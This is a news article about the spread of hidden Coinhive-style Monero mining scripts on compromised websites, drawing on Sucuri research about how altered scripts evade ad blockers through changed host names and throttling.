Malicious Crypto Mining Continues to Evolve and Evade Ad Blockers

Anyone who has kept an eye on the cryptocurrency industry will know that malicious crypto mining is becoming a very real problem. We are not just talking about cryptojacking here, but also the growing number of websites embedding Monero mining scripts with or without user consent. Even though ad blockers alleviate most of these concerns, it has become evident the problem is simply taking a different form.

Malicious Cryptocurrency Mining is Evolving

While we have noted before that cryptojacking is becoming increasingly popular in Sweden, that is only one face of the malicious crypto mining threat. That’s because the number of websites embedding the Coinhive and similar mining scripts is still growing. While it may seem counterproductive at first, there appears to be a profitable business model behind this idea.

According to new research by Sucuri, the number of compromised websites running various iterations of the Coinhive API is becoming quite worrisome. At the same time, the company also notes criminals are getting a lot craftier when it comes to embedding this code into such websites and content management systems. That is not a positive sign by any stretch of the imagination.

What makes this trend so worrisome is that these altered versions of the Coinhive script are also capable of bypassing any ad blocker setup users may have at any given time. It goes to show there is only so much one can achieve by using an ad blocker, but it remains to be seen if a more robust countermeasure comes around at some point. There’s been an increasing use of proxies and services which operate in a manner similar to Coinhive.

Some sites even engage in a more devious form of malicious crypto mining altogether. More specifically, they can change between different versions of their miners to increase their exposure and ensure optimal revenue generation at all times. All it takes is a different host name to bypass virtually all ad blocker blacklists associated with Coinhive right now, indicating there is still a very long way to go until this threat is completely nullified.

It is evident consumers will need to remain vigilant when it comes to addressing these problems. While an ad blocker blacklist is a must, constantly monitoring one’s overall CPU usage is still advised at this time. Since malicious crypto mining uses 30% or more of one’s CPU power at all times, it should not be much of a problem to keep an eye on these numbers. Unfortunately, a lot of miners are now throttled in order to go by undetected for longer periods of time.

In the end, it is safe to say the malicious crypto mining industry is still evolving and will continue to do so for quite some time. Defenders and security companies will need to come up with new and viable solutions fairly quickly, which is always a challenge. Ad blockers and web blocking are two valuable tools for all consumers, but neither option is perfect by any means.